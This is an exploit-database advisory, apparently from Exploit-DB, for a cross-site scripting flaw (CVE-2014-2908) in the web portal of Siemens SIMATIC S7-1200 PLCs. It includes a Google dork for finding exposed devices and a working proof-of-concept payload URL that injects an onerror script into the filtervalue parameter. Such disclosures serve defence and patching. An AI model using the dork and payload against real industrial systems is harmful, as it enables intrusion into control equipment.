header-logo
Suggest Exploit
vendor:
SIMATIC S7-1200 CPU
by:
t4rkd3vilz, Jameel Nabbo
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: SIMATIC S7-1200 CPU
Affected Version From: SIMATIC S7-1200 CPU family Versions: V2.X
Affected Version To: SIMATIC S7-1200 CPU family Versions: V3.X
Patch Exists: YES
Related CWE: CVE-2014-2908
CPE: a:siemens:simatic_s7-1200_cpu
Metasploit:
Other Scripts:
Tags: cve,cve2014,xss,siemens,edb
CVSS Metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
Nuclei Metadata: {'max-request': 1, 'vendor': 'siemens', 'product': 'simatic_s7_cpu_1200_firmware'}
Platforms Tested: Kali Linux
2018

Siemens SIMATIC S7-1200 CPU – Cross-Site Scripting

The Siemens SIMATIC S7-1200 CPU family versions V2.X and V3.X are vulnerable to cross-site scripting (XSS) attacks. An attacker can exploit this vulnerability by injecting malicious script code into the 'filtervalue' parameter of the '/Portal/Portal.mwsl' page. This can lead to the execution of arbitrary code in the context of the victim's browser, potentially allowing the attacker to steal sensitive information or perform unauthorized actions.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest security updates provided by Siemens. Additionally, input validation and output encoding techniques should be implemented to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family Versions: V2.X and V3.X.
# Tested on: Kali Linux
# CVE: CVE-2014-2908

http://TargetIp/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=
<http://targetip/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=>"><img
src=x onerror=prompt(1);>&Send=Filter